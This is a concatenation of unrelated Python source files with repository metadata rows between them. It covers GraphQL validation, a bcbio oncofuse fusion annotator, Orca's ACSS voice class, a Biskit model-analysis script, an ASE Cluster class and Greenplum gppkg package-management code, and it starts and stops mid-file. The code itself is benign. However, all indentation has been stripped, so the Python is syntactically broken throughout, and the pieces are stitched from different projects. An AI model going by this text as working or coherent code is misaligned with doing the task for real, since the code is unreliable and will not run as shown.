Rules.PossibleFragmentSpreads,
Rules.NoFragmentCycles,
Rules.NoUndefinedVariables,
Rules.NoUnusedVariables,
Rules.KnownDirectives,
Rules.KnownArgumentNames,
Rules.UniqueArgumentNames,
Rules.ArgumentsOfCorrectType,
Rules.ProvidedNonNullArguments,
Rules.DefaultValuesOfCorrectType,
Rules.VariablesInAllowedPosition,
Rules.OverlappingFieldsCanBeMerged,
]
def validate(schema, ast, rules=None):
assert schema, 'Must provide schema'
assert ast, 'Must provide document'
assert isinstance(schema, GraphQLSchema)
if rules is None:
rules = specified_rules
return visit_using_rules(schema, ast, rules)
def visit_using_rules(schema, ast, rules):
type_info = TypeInfo(schema)
context = ValidationContext(schema, ast, type_info)
errors = []
for rule in rules:
instance = rule(context)
visit(ast, ValidationVisitor(instance, type_info, errors))
return errors
class ValidationVisitor(Visitor):
__slots__ = ['instance', 'type_info', 'errors', 'visit_spread_fragments']
def __init__(self, instance, type_info, errors):
self.instance = instance
self.type_info = type_info
self.errors = errors
self.visit_spread_fragments = getattr(self.instance, 'visit_spread_fragments', False)
def enter(self, node, key, parent, path, ancestors):
self.type_info.enter(node)
if isinstance(node, FragmentDefinition) and key and self.visit_spread_fragments:
return False
result = self.instance.enter(node, key, parent, path, ancestors)
if result and is_error(result):
append(self.errors, result)
result = False
if result is None and self.visit_spread_fragments and isinstance(node, FragmentSpread):
fragment = self.instance.context.get_fragment(node.name.value)
if fragment:
visit(fragment, self)
if result is False:
self.type_info.leave(node)
return result
def leave(self, node, key, parent, path, ancestors):
result = self.instance.leave(node, key, parent, path, ancestors)
if result and is_error(result):
append(self.errors, result)
result = False
self.type_info.leave(node)
return result
def is_error(value):
if isinstance(value, list):
return all(isinstance(item, GraphQLError) for item in value)
return isinstance(value, GraphQLError)
def append(arr, items):
if isinstance(items, list):
arr.extend(items)
else:
arr.append(items)
class ValidationContext(object):
__slots__ = ['_schema', '_ast', '_type_info', '_fragments']
def __init__(self, schema, ast, type_info):
self._schema = schema
self._ast = ast
self._type_info = type_info
self._fragments = None
def get_schema(self):
return self._schema
def get_ast(self):
return self._ast
def get_fragment(self, name):
fragments = self._fragments
if fragments is None:
self._fragments = fragments = {}
for statement in self.get_ast().definitions:
if isinstance(statement, FragmentDefinition):
fragments[statement.name.value] = statement
return fragments.get(name)
def get_type(self):
return self._type_info.get_type()
def get_parent_type(self):
return self._type_info.get_parent_type()
def get_input_type(self):
return self._type_info.get_input_type()
def get_field_def(self):
return self._type_info.get_field_def()
def get_directive(self):
return self._type_info.get_directive()
def get_argument(self):
return self._type_info.get_argument()
|
jhgg/graphqllib
|
graphql/core/validation/__init__.py
|
Python
|
mit
| 4,372
|
[
"VisIt"
] |
34628bf452bc97a7bf428b5a0673b9b6fb82735fa6665778352ec476d2edc8ba
|
"""annotate fusion outputs from STAR and Tophat
Supported:
oncofuse: http://www.unav.es/genetica/oncofuse.html
github: https://github.com/mikessh/oncofuse
"""
from __future__ import print_function
import os
import pysam
from bcbio.utils import file_exists
from bcbio.distributed.transaction import file_transaction
from bcbio.pipeline import config_utils
from bcbio.provenance import do
import bcbio.pipeline.datadict as dd
from bcbio.log import logger
# ## oncofuse fusion trancript detection
def run(data):
if not aligner_supports_fusion(data):
aligner = dd.get_aligner(data)
logger.warning("Fusion mode is not supported for the %s aligner, "
"skipping. " % aligner)
return None
config = data["config"]
genome_build = data.get("genome_build", "")
input_type, input_dir, input_file = _get_input_para(data)
if genome_build == "GRCh37": # assume genome_build is hg19 otherwise
if config["algorithm"].get("aligner") in ["star"]:
input_file = _fix_star_junction_output(input_file)
if config["algorithm"].get("aligner") in ["tophat", "tophat2"]:
input_file = _fix_tophat_junction_output(input_file)
elif "hg19" not in genome_build:
return None
#handle cases when fusion file doesn't exist
if not file_exists(input_file):
return None
out_file = os.path.join(input_dir, "oncofuse_out.txt")
if file_exists(out_file):
return out_file
oncofuse = config_utils.get_program("oncofuse", config)
tissue_type = _oncofuse_tissue_arg_from_config(data)
resources = config_utils.get_resources("oncofuse", config)
if not file_exists(out_file):
cl = [oncofuse]
cl += resources.get("jvm_opts", ["-Xms750m", "-Xmx5g"])
with file_transaction(data, out_file) as tx_out_file:
cl += [input_file, input_type, tissue_type, tx_out_file]
cmd = " ".join(cl)
try:
do.run(cmd, "oncofuse fusion detection", data)
except:
do.run("touch %s && echo '# failed' >> %s" % (tx_out_file, tx_out_file), "oncofuse failed", data)
#return out_file
return out_file
def is_non_zero_file(fpath):
return True if os.path.isfile(fpath) and os.path.getsize(fpath) > 0 else False
def aligner_supports_fusion(data):
SUPPORTED_ALIGNERS = ["tophat2", "tophat", "star"]
aligner = dd.get_aligner(data).lower()
return aligner in SUPPORTED_ALIGNERS
def _get_input_para(data):
TOPHAT_FUSION_OUTFILE = "fusions.out"
STAR_FUSION_OUTFILE = "Chimeric.out.junction"
config = data["config"]
is_disambiguate = len(config["algorithm"].get("disambiguate", [])) > 0
aligner = config["algorithm"].get("aligner")
if aligner == "tophat2":
aligner = "tophat"
names = data["rgnames"]
# set some default hard filters:
N = 2 # min. spanning reads
M = 4 # min. supporting reads (spanning + encompassing)
align_dir_parts = os.path.join(data["dirs"]["work"], "align", names["sample"])
align_dir_parts = os.path.join(align_dir_parts, data["genome_build"]) if is_disambiguate else align_dir_parts
if aligner in ["tophat", "tophat2"]:
align_dir_parts = os.path.join(data["dirs"]["work"], "align", names["sample"], names["lane"]+"_%s" % aligner)
return "tophat-%d-%d" % (N,M), align_dir_parts, os.path.join(align_dir_parts, TOPHAT_FUSION_OUTFILE)
if aligner in ["star"]:
star_junction_file = os.path.join(align_dir_parts, names["lane"]+STAR_FUSION_OUTFILE)
if is_disambiguate:
contamination_bam = data["disambiguate"][ config["algorithm"]["disambiguate"][0] ]
disambig_out_file = star_junction_file + "_disambiguated"
if file_exists(disambig_out_file):
star_junction_file = disambig_out_file
elif file_exists(star_junction_file) and file_exists(contamination_bam):
star_junction_file = _disambiguate_star_fusion_junctions(star_junction_file, contamination_bam,
disambig_out_file, data)
return "rnastar-%d-%d" % (N,M), align_dir_parts, star_junction_file
return None
def _fix_tophat_junction_output(chimeric_out_junction_file):
#for fusion.out
out_file = chimeric_out_junction_file + ".hg19"
with open(out_file, "w") as out_handle:
with open(chimeric_out_junction_file, "r") as in_handle:
for line in in_handle:
parts = line.split("\t")
left, right = parts[0].split("-")
leftchr = _h37tohg19(left)
rightchr = _h37tohg19(right)
if not leftchr or not rightchr:
continue
parts[0] = "%s-%s" % (_h37tohg19(left), _h37tohg19(right))
out_handle.write("\t".join(parts))
return out_file
def _fix_star_junction_output(chimeric_out_junction_file):
#for Chimeric.out.junction
out_file = chimeric_out_junction_file + ".hg19"
with open(out_file, "w") as out_handle:
with open(chimeric_out_junction_file, "r") as in_handle:
for line in in_handle:
parts = line.split("\t")
parts[0] = _h37tohg19(parts[0])
parts[3] = _h37tohg19(parts[3])
if not parts[0] or not parts[3]:
continue
out_handle.write("\t".join(parts))
return out_file
def _h37tohg19(chromosome):
MAX_CHROMOSOMES = 23
if chromosome in [str(x) for x in range(1, MAX_CHROMOSOMES)] + ["X", "Y"]:
new_chrom = "chr%s" % chromosome
elif chromosome == "MT":
new_chrom = "chrM"
# not a supported chromosome
else:
return None
return new_chrom
def _oncofuse_tissue_arg_from_config(data):
"""Retrieve oncofuse arguments supplied through input configuration.
tissue_type is the library argument, which tells Oncofuse to use its
own pre-built gene expression libraries. There are four pre-built
libraries, corresponding to the four supported tissue types:
EPI (epithelial origin),
HEM (hematological origin),
MES (mesenchymal origin) and
AVG (average expression, if tissue source is unknown).
"""
SUPPORTED_TISSUE_TYPE = ["EPI", "HEM", "MES", "AVG"]
if data.get("metadata", {}).get("tissue") in SUPPORTED_TISSUE_TYPE:
return data.get("metadata", {}).get("tissue")
else:
return "AVG"
def _disambiguate_star_fusion_junctions(star_junction_file, contamination_bam, disambig_out_file, data):
""" Disambiguate detected fusions based on alignments to another species.
"""
out_file = disambig_out_file
fusiondict = {}
for my_line in open(star_junction_file, "r"):
my_line_split = my_line.strip().split("\t")
if len(my_line_split) < 10:
continue
fusiondict[my_line_split[9]] = my_line.strip("\n")
samfile = pysam.Samfile(contamination_bam, "rb")
for my_read in samfile:
if 0x4 & my_read.flag or my_read.is_secondary: # flag 0x4 means unaligned
continue
if my_read.qname in fusiondict:
fusiondict.pop(my_read.qname)
with file_transaction(data, out_file) as tx_out_file:
myhandle = open(tx_out_file, 'w')
for my_key in fusiondict:
print(fusiondict[my_key], file=myhandle)
return out_file
|
mjafin/bcbio-nextgen
|
bcbio/rnaseq/oncofuse.py
|
Python
|
mit
| 7,469
|
[
"pysam"
] |
d2843315735610fc1a3b1cb58f574804f967acbdd66779cd5904ea3c273d70c9
|
# Orca
#
# Copyright 2005-2008 Google Inc.
# Portions Copyright 2007-2008, Sun Microsystems, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
#
"""ACSS --- Aural CSS.
Class ACSS defines a simple wrapper for holding ACSS voice
definitions. Speech engines implement the code for converting
ACSS definitions into engine-specific markup codes.
"""
__id__ = "$Id$"
__author__ = "T. V. Raman"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2005-2008 Google Inc."
__license__ = "LGPL"
class ACSS(dict):
"""Holds ACSS representation of a voice."""
FAMILY = 'family'
RATE = 'rate'
GAIN = 'gain'
AVERAGE_PITCH = 'average-pitch'
PITCH_RANGE = 'pitch-range'
STRESS = 'stress'
RICHNESS = 'richness'
PUNCTUATIONS = 'punctuations'
# A value of None means use the engine's default value.
#
settings = {
FAMILY : None,
RATE : 50,
GAIN : 10,
AVERAGE_PITCH : 5,
PITCH_RANGE : 5,
STRESS : 5,
RICHNESS : 5,
PUNCTUATIONS : 'all'
}
def __init__(self, props=None):
"""Create and initialize ACSS structure."""
dict.__init__(self)
props = props or {}
if props:
for k in props:
if k == 'established' or k in ACSS.settings:
# Do a 'deep copy' of the family. Otherwise,
# the new ACSS shares the actual data with the
# props passed in. This can cause unexpected
# side effects.
#
if k == ACSS.FAMILY:
self[k] = {}
for j in props[k].keys():
self[k][j] = props[k][j]
else:
self[k] = props[k]
else:
self['established'] = False
def __setitem__ (self, key, value):
"""Update name when we change values."""
dict.__setitem__(self, key, value)
def __delitem__(self, key):
"""Update name if we delete a key."""
dict.__delitem__(self, key)
def name(self):
_name = 'acss-'
names = list(self.keys())
if names:
names.sort()
for k in names:
_name += "%s-%s:" % (k, self[k])
_name = _name[:-1]
return _name
def getLocale(self):
family = self.get(ACSS.FAMILY, {})
return family.get('locale')
def getDialect(self):
family = self.get(ACSS.FAMILY, {})
return family.get('dialect')
def update(self, newDict):
family = newDict.get(ACSS.FAMILY)
if isinstance(family, dict) and family.get('name') is None:
newDict.pop(ACSS.FAMILY)
return super().update(newDict)
|
GNOME/orca
|
src/orca/acss.py
|
Python
|
lgpl-2.1
| 3,569
|
[
"ORCA"
] |
aeed5e5ea790645c5a055e1b70282bd6983bddbd136802c34ad7b76b8de077d8
|
#!/usr/bin/env python
##
## Biskit, a toolkit for the manipulation of macromolecular structures
## Copyright (C) 2004-2018 Raik Gruenberg & Johan Leckner
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You find a copy of the GNU General Public License in the file
## license.txt along with this program; if not, write to the Free
## Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
## Contributions: Olivier PERIN, Raik Gruenberg
from Biskit.Mod.Analyse import Analyse as A
from Biskit.Mod.ValidationSetup import ValidationSetup as VS
from Biskit.Mod.Benchmark import Benchmark as B
import Biskit.tools as T
import sys, os
import Biskit.Pymoler as Pymoler
def _use( o ):
print """
Syntax: analyse.py -d |main project folder| [-s |1||0] ]
Result: Performing model analysis for each main project folder given.
Outputs a folder 'analyse' containing:
* analyse/global_results.out
various data about the model, see file header.
* analyse/local_results.out:
residue rmsd profile to taget and mean rmsd to tagret
* modeller/final.pdb:
the 'best' model with the mean residue rmsd in the B-factor column
Options:
-d [str], list of project directory
-s show the structure final.pdb im PyMol
"""
for key, value in o.items():
print "\t-",key, "\t",value
sys.exit(0)
if __name__ == '__main__':
options = T.cmdDict()
f = os.getcwd()
if '?' in options or 'help' in options:
_use( options )
if not os.path.exists(f + VS.F_RESULT_FOLDER) and not options.has_key('d'):
print 'Current directory is not a valid modeling project folder.'
_use( options )
## Try to add project folders
## look for default cross-validation projects
d = []
if os.path.exists( f + VS.F_RESULT_FOLDER ):
d = [ f ]
if options.has_key('d'):
folders = T.toList(options['d'])
else:
folders = d
T.flushPrint("Starting job...\n")
for f in folders:
a = A(outFolder=f)
a.go()
T.flushPrint("Done.\n")
## show result in PyMol
if options.has_key('s'):
p=Pymoler()
p.addPdb( folders[0] + a.F_FINAL_PDB )
p.add('color_b')
p.add('select na, b<0')
p.add('color grey, na')
p.add('hide all')
p.add('show cartoon')
p.add('show stick')
p.add('hide stick, name o+c+n')
p.add('select ca, /////ca')
p.add('label ca,"%s-%s"%(resn, resi)')
p.add('select none')
p.show()
|
graik/biskit
|
archive_biskit2/scripts/Mod/analyse.py
|
Python
|
gpl-3.0
| 3,127
|
[
"PyMOL"
] |
fa9f5eda6a1b7d5b331f0cb303e4f8b3454bf373be6a3034f54120783bd0c4aa
|
import os
import math
import numpy as np
import pickle as pickle
from ase import Atoms
from ase.data import chemical_symbols
from ase.cluster.base import ClusterBase
class Cluster(Atoms, ClusterBase):
symmetry = None
surfaces = None
lattice_basis = None
resiproc_basis = None
atomic_basis = None
def copy(self):
cluster = Atoms.copy(self)
cluster.symmetry = self.symmetry
cluster.surfaces = self.surfaces.copy()
cluster.lattice_basis = self.lattice_basis.copy()
cluster.atomic_basis = self.atomic_basis.copy()
cluster.resiproc_basis = self.resiproc_basis.copy()
return cluster
def get_surfaces(self):
"""Returns the miller indexs of the stored surfaces of the cluster."""
if not self.surfaces is None:
return self.surfaces.copy()
else:
return None
def get_layers(self):
"""Return number of atomic layers in stored surfaces directions."""
layers = []
for s in self.surfaces:
n = self.miller_to_direction(s)
c = self.get_positions().mean(axis=0)
r = np.dot(self.get_positions() - c, n).max()
d = self.get_layer_distance(s, 2)
l = 2 * np.round(r / d).astype(int)
ls = np.arange(l - 1, l + 2)
ds = np.array([self.get_layer_distance(s, i) for i in ls])
mask = (np.abs(ds - r) < 1e-10)
layers.append(ls[mask][0])
return np.array(layers, int)
def get_diameter(self, method='volume'):
"""Returns an estimate of the cluster diameter based on two different
methods.
method = 'volume': Returns the diameter of a sphere with the
same volume as the atoms. (Default)
method = 'shape': Returns the averaged diameter calculated from the
directions given by the defined surfaces.
"""
if method == 'shape':
cen = self.get_positions().mean(axis=0)
pos = self.get_positions() - cen
d = 0.0
for s in self.surfaces:
n = self.miller_to_direction(s)
r = np.dot(pos, n)
d += r.max() - r.min()
return d / len(self.surfaces)
elif method == 'volume':
V_cell = np.abs(np.linalg.det(self.lattice_basis))
N_cell = len(self.atomic_basis)
N = len(self)
return 2.0 * (3.0 * N * V_cell /
(4.0 * math.pi * N_cell)) ** (1.0 / 3.0)
else:
return 0.0
#Functions to store the cluster
def write(self, filename=None):
if not isinstance(filename, str):
raise Warning('You must specify a valid filename.')
if os.path.isfile(filename):
os.rename(filename, filename + '.bak')
d = {'symmetry': self.symmetry,
'surfaces': self.surfaces,
'lattice_basis': self.lattice_basis,
'resiproc_basis': self.resiproc_basis,
'atomic_basis': self.atomic_basis,
'cell': self.get_cell(),
'pbc': self.get_pbc()}
f = open(filename, 'w')
f.write('Cluster')
pickle.dump(d, f)
pickle.dump(self.arrays, f)
f.close()
def read(self, filename):
if not os.path.isfile(filename):
raise Warning('The file specified do not exist.')
f = open(filename, 'r')
try:
if f.read(len('Cluster')) != 'Cluster':
raise Warning('This is not a compatible file.')
d = pickle.load(f)
self.arrays = pickle.load(f)
except EOFError:
raise Warning('Bad file.')
f.close()
self.symmetry = d['symmetry']
self.surfaces = d['surfaces']
self.lattice_basis = d['lattice_basis']
self.resiproc_basis = d['resiproc_basis']
self.atomic_basis = d['atomic_basis']
self.set_cell(d['cell'])
self.set_pbc(d['pbc'])
self.set_constraint()
self.adsorbate_info = {}
self.calc = None
|
suttond/MODOI
|
ase/cluster/cluster.py
|
Python
|
lgpl-3.0
| 4,164
|
[
"ASE"
] |
ca8c27e8c24c2296035aa73c02b4b99f68bf0af7f1e01782927444abbba45aa9
|
# Line too long - pylint: disable=C0301
# Copyright (c) Greenplum Inc 2011. All Rights Reserved.
from contextlib import closing
import os
import platform
import shutil
import sys
import tarfile
try:
from gppylib import gplog
from gppylib.commands import gp
from gppylib.commands.base import Command, REMOTE, WorkerPool, ExecutionError
from gppylib.commands.unix import Scp
from gppylib.gpversion import GpVersion
from gppylib.mainUtils import ExceptionNoStackTraceNeeded
from gppylib.operations import Operation
from gppylib.operations.utils import RemoteOperation, ParallelOperation
from gppylib.operations.unix import CheckFile, CheckDir, MakeDir, RemoveFile, RemoveRemoteTree, RemoveRemoteFile, CheckRemoteDir, MakeRemoteDir, CheckRemoteFile, ListRemoteFilesByPattern, ListFiles, ListFilesByPattern
from gppylib.utils import TableLogger
import yaml
from yaml.scanner import ScannerError
except ImportError, ex:
sys.exit('Operation: Cannot import modules. Please check that you have sourced greenplum_path.sh. Detail: ' + str(ex))
logger = gplog.get_default_logger()
def dereference_symlink(path):
"""
MPP-15429: rpm is funky with symlinks...
During an rpm -e invocation, rpm mucks with the /usr/local/greenplum-db symlink.
From strace output, it appears that rpm tries to rmdir any directories it may have created during
package installation. And, in the case of our GPHOME symlink, rpm will actually try to unlink it.
To avoid this scenario, we perform all rpm actions against the "symlink dereferenced" $GPHOME.
"""
path = os.path.normpath(path)
if not os.path.islink(path):
return path
link = os.path.normpath(os.readlink(path))
if os.path.isabs(link):
return link
return os.path.join(os.path.dirname(path), link)
GPHOME = dereference_symlink(gp.get_gphome())
GPPKG_EXTENSION = '.gppkg'
SPECFILE_NAME = 'gppkg_spec.yml'
SPECFILE_REQUIRED_TAGS = ['pkgname', 'version', 'architecture', 'os', 'description', 'gpdbversion']
SPECFILE_OPTIONAL_TAGS = ['preinstall', 'postinstall', 'preuninstall', 'postuninstall', 'postupdate']
# TODO: AK: Our interactions with the internal RPM database could benefit from an abstraction layer
# that hides the underlying commands used for installation, uninstallation, queries, etc.
RPM_DATABASE_PATH = 'share/packages/database'
RPM_DATABASE = os.path.join(GPHOME, RPM_DATABASE_PATH)
RPM_INSTALLATION_PATH = GPHOME
# TODO: AK: Our interactions with the archive could benefit from an abstraction layer
# that hides the implementations of archival, unarchival, queries, etc.
# That is, consider the query "is this package already archived?" Currently, this is implemented
# with a CheckFile. Rather, it should be a call to Archive.contains(package), where package
# is instanceof Gppkg.
ARCHIVE_PATH = 'share/packages/archive'
GPPKG_ARCHIVE_PATH = os.path.join(GPHOME, ARCHIVE_PATH)
# TODO: AK: Shouldn't this be "$GPHOME/.tmp"?
# i.e. what if remote host has its $GPHOME elsewhere?
TEMP_EXTRACTION_PATH = GPHOME + '/.tmp'
DEPS_DIR = 'deps'
class GpdbVersionError(Exception):
'''
Exception to notify that the gpdb version
does not match
'''
pass
class AlreadyInstalledError(Exception):
def __init__(self, package_name):
Exception.__init__(self, '%s is already installed.' % package_name)
class NotInstalledError(Exception):
def __init__(self, package_name):
Exception.__init__(self, '%s is not installed.' % package_name)
class BuildPkgError(Exception):
'''
Exception to notify that there was an error during
the building of a gppkg
'''
pass
class MissingDependencyError(Exception):
'''
Exception to catch missing dependency
'''
def __init__(self, value):
Exception.__init__(self, 'Dependency %s is missing' % value )
class OSCompatibilityError(Exception):
'''
Exception to notify that OS does not meet the
requirement
'''
def __init__(self, requiredos, foundos):
Exception.__init__(self, '%s OS required. %s OS found' % (requiredos, foundos))
class ArchCompatibilityError(Exception):
'''
Exception to notify that architecture does not meet
the requirement
'''
def __init__(self, requiredarch, foundarch):
Exception.__init__(self, '%s Arch required. %s Arch found' % (requiredarch, foundarch))
class RequiredDependencyError(Exception):
'''
Exception to notify that the package being uninstalled
is a dependency for another package
'''
pass
class Gppkg:
'''
This class stores all the information about a gppkg
'''
def __init__(self, pkg, pkgname, main_rpm, version, architecture, os, gpdbversion, description, abspath, preinstall, postinstall, preuninstall, postuninstall, postupdate, dependencies, file_list):
'''
The constructor takes the following arguments
pkg The complete package name e.g pgcrypto-1.0-Darwin-i386.gppkg TODO: AK: This is an awful variable name. Change to "package_filename".
pkgname The name of the package as specified in the spec file
main_rpm The name of the main rpm. e.g PL/R, PostGIS etc
version The version of the gppkg
architecture The architecture for which the package is built
os The operating system for which the package is built
gpdbversion The Greenplum Database version for which package is built
description A short description for the package
abspath This is the absolute path where the package sits on the host
preinstall The cluster level preinstallation hooks
postinstall The cluster level postinstallation hooks
preuninstall The cluster level preuninstallation hooks
postuninstall The cluster level postuninstallation hooks
postupdate The cluster level postupdate hooks
dependencies The dependencies of the package. e.g Geos, Proj in case of PostGIS
file_list The list of files present in the package
'''
logger.debug('Gppkg Constructor')
self.pkg = pkg
self.pkgname = pkgname
self.main_rpm = main_rpm
self.version = version
self.architecture = architecture
self.os = os
self.gpdbversion = gpdbversion
self.description = description
self.abspath = abspath
self.preinstall = preinstall
self.postinstall = postinstall
self.preuninstall = preuninstall
self.postuninstall = postuninstall
self.postupdate = postupdate
self.dependencies = dependencies
self.file_list = file_list
@staticmethod
def from_package_path(pkg_path):
'''
This method takes a package as the argument and
obtains all the information about the package
Details include name, arch, OS, version, description, dependencies,
list of files present in the package and returns a gppkg object
'''
logger.debug('from_package_path')
if not os.path.exists(pkg_path):
logger.error('Cannot find package %s' % pkg_path)
raise IOError
#We check for a directory first because
#is_tarfile does not accept directories as path names
if os.path.isdir(pkg_path):
logger.error('%s is a directory !' % pkg_path)
raise IOError
if not tarfile.is_tarfile(pkg_path) or not pkg_path.endswith(GPPKG_EXTENSION):
logger.error('%s is Not a valid package' % pkg_path)
raise IOError
if os.path.getsize(pkg_path) == 0:
logger.error('Package is empty')
raise IOError
pkg = {}
# XXX: AK: It's purely coincidence that the optional tags are lists.
for tag in SPECFILE_REQUIRED_TAGS:
pkg[tag] = ''
for tag in SPECFILE_OPTIONAL_TAGS:
pkg[tag] = []
pkg['file_list'] = []
pkg['dependencies'] = []
with closing(tarfile.open(pkg_path, 'r:gz')) as tarinfo:
#store the list of all files present in the archive
archive_list = tarinfo.getnames()
pkg["file_list"] = archive_list
#The spec file has to be called gppkg_spec
#so there will only be one such file,
#so we dont need to worry about the loop
#overwriting the 'specfile' variable with different values
for cur_file in archive_list:
if cur_file.endswith(SPECFILE_NAME):
specfile = tarinfo.extractfile(cur_file)
yamlfile = yaml.load(specfile)
keys = yamlfile.keys()
#store all the tags
for key in keys:
pkg[key.lower()] = yamlfile[key]
#update the pkgpath
pkg['pkg'] = os.path.split(pkg_path)[-1]
#make the version as string
pkg['version'] = str(pkg['version'])
#Convert the required version to a GpVersion
pkg['gpdbversion'] = GpVersion(str(pkg['gpdbversion']))
#update the absolute path
pkg['abspath'] = pkg_path
#store all the dependencies of the gppkg
for cur_file in archive_list:
if cur_file.find('deps/') != -1 and cur_file.endswith('.rpm'):
pkg['dependencies'].append(cur_file[cur_file.rfind('/') + 1:])
#store the main rpm
for cur_file in archive_list:
if cur_file.find('deps/') == -1 and cur_file.endswith('.rpm'):
pkg['main_rpm'] = cur_file
gppkg = Gppkg(**pkg)
return gppkg
class LocalCommand(Operation):
'''
DEPRECATED
TODO: AK: Eliminate this. Replace invocations with Command(...).run(validateAfter = True)
'''
def __init__(self, cmd_str, echo = False):
self.cmd_str = cmd_str
self.echo = echo
def execute(self):
logger.debug(self.cmd_str)
cmd = Command(name = 'LocalCommand', cmdStr = self.cmd_str)
cmd.run(validateAfter = True)
if self.echo:
echo_str = cmd.get_results().stdout.strip()
if echo_str:
logger.info(echo_str)
return cmd.get_results()
class RemoteCommand(Operation):
"""
DEPRECATED
TODO: AK: Rename as GpSsh, like GpScp below.
"""
def __init__(self, cmd_str, host_list):
self.cmd_str = cmd_str
self.host_list = host_list
self.pool = None
def execute(self):
logger.debug(self.cmd_str)
# Create Worker pool
# and add commands to it
self.pool = WorkerPool()
for host in self.host_list:
cmd = Command(name = 'Remote Command', cmdStr = self.cmd_str, ctxt = REMOTE, remoteHost = host)
self.pool.addCommand(cmd)
self.pool.join()
#This will raise ExecutionError exception if even a single command fails
self.pool.check_results()
class ListPackages(Operation):
'''
Lists all the packages present in
$GPHOME/share/packages/archive
'''
def __init__(self):
pass
def execute(self):
# Ensure archive path exists
# TODO: AK: In hindsight, this should've been named MakeDirP,
# to reflect that it won't blow up if the path already exists.
MakeDir(GPPKG_ARCHIVE_PATH).run()
package_list = ListFilesByPattern(GPPKG_ARCHIVE_PATH, '*' + GPPKG_EXTENSION).run()
package_name_list = []
for pkg in package_list:
pkg_name = pkg.split('/')[-1]
package_name_list.append(pkg_name[:pkg_name.index('-', pkg_name.index('-') + 1)])
return package_name_list
class CleanupDir(Operation):
'''
Cleans up the given dir
Returns True if either the dir is already removed
or if we were able to remove the dir successfully
False for other errors
'''
def __init__(self, dir_path):
self.dir_path = dir_path
def execute(self):
dir_path = self.dir_path
logger.debug('Cleaning up %s' % dir_path)
#If file does not exist, nothing to remove
#So we return true
if not os.path.exists(dir_path):
return True
if os.path.isdir(dir_path):
shutil.rmtree(dir_path)
else:
return False
return True
class IsVersionCompatible(Operation):
'''
Returns True if the gppkg is compatible
with the gpdb version that has been installed
'''
def __init__(self, gppkg):
self.gppkg = gppkg
def execute(self):
gppkg = self.gppkg
gpdb_version = self._get_gpdb_version()
required_gpdb_version = gppkg.gpdbversion
logger.debug('Greenplum Database Version = %s' % gpdb_version)
logger.debug('Required Greenplum Database version = %s' % required_gpdb_version)
if gpdb_version is None:
logger.error('Could not determine Greenplum Database version')
return False
if not required_gpdb_version.isVersionRelease(gpdb_version):
logger.error('%s requires Greenplum Database version %s' % (gppkg.pkgname, required_gpdb_version))
return False
if not 'orca' in gppkg.version and ".".join(map(str,gpdb_version.version)) >= '4.3.5':
logger.error('Greenplum Database requires orca version of %s' % (gppkg.pkg))
return False
return True
def _get_gpdb_version(self):
'''
Get the version of the current GPDB
Returns a string consisting of the major
release version
'''
logger.debug('_get_gpdb_version')
self.gphome = gp.get_gphome()
version = gp.GpVersion.local('local GP software version check', self.gphome)
gpdb_version = GpVersion(version.strip())
return gpdb_version
class ValidateInstallPackage(Operation):
"""
Ensure that the given rpms can be installed safely. This is accomplished mainly
through use of rpm --test, which will have one of a few outcomes:
1) A return code of 0, indicating the installation should proceed smoothly
2) A non-zero return code, and stderr indicating some of the rpms are already installed.
We simply omit such rpms from the returned list of rpms, indicating to the caller
that to be successful, installation should only be attempted on the filtered list of rpms.
3) A non-zero return code, and stderr indicating that a failed dependency issue will arise.
This scenario must result in a MissingDependencyError.
Note: install and update share this code, because there is extensive commonality in regards
to the version, os, arch. checking, in addition to the 3 code paths enumerated just above.
Lastly, for an edge case, if we determine that all of the relevant rpms are currently installed
*and* the archive package already exists we declare the package is already installed.
TODO: This is depending on ExtractPackage having put the dependencies in this same directory.
TODO: Use regexes for more reliable string matching. CR-2865#c20112
"""
def __init__(self, gppkg, is_update = False):
self.gppkg = gppkg
self.is_update = is_update
def execute(self):
#Check the GPDB requirements
if not IsVersionCompatible(self.gppkg).run():
raise GpdbVersionError
# TODO: AK: I've changed our use of the OS tag from 'Linux' to 'rhel5' or 'suse10'.
# So, the two lines below will not work properly.
#if self.gppkg.os.lower() != platform.system().lower():
# raise OSCompatibilityError(self.gppkg.os, platform.system().lower())
#architecture compatibility
if self.gppkg.architecture.lower() != platform.machine().lower():
raise ArchCompatibilityError(self.gppkg.architecture, platform.machine().lower())
rpm_set = set([self.gppkg.main_rpm] + self.gppkg.dependencies)
rpm_install_string = ' '.join([os.path.join(TEMP_EXTRACTION_PATH, rpm) for rpm in rpm_set])
if self.is_update:
rpm_install_command = 'rpm --test -U --force %s --dbpath %s --prefix %s' % (rpm_install_string, RPM_DATABASE, RPM_INSTALLATION_PATH)
else:
rpm_install_command = 'rpm --test -i %s --dbpath %s --prefix %s' % (rpm_install_string, RPM_DATABASE, RPM_INSTALLATION_PATH)
cmd = Command('Validating rpm installation', rpm_install_command)
logger.info(cmd) # TODO: AK: This should be debug(), but RMI cannot propagate a log level.
try:
cmd.run(validateAfter = True)
except ExecutionError, e:
lines = e.cmd.get_results().stderr.splitlines()
# Forking between code paths 2 and 3 depends on some meaningful stderr
# Without such stderr, we must bubble up the ExecutionError.
if len(lines) == 0:
raise
if 'failed dependencies' in lines[0].lower():
# Code path 3 (see docstring)
# example stderr:
# error: Failed dependencies:
# geos-3.2.2-1.x86_64.rpm is needed by postgis-1.0-1.x86_64
# TODO: AK: Dependencies should be parsed out here and used to initialize
# this MissingDependencyError. However, this exception does not support
# multiple missing dependencies. Some refactoring work is needed in both places.
logger.error(e.cmd.get_results().stderr)
raise MissingDependencyError('')
# Code path 2, possibly (see docstring)
# example stderr:
# package geos-3.2.2-1.x86_64 is already installed
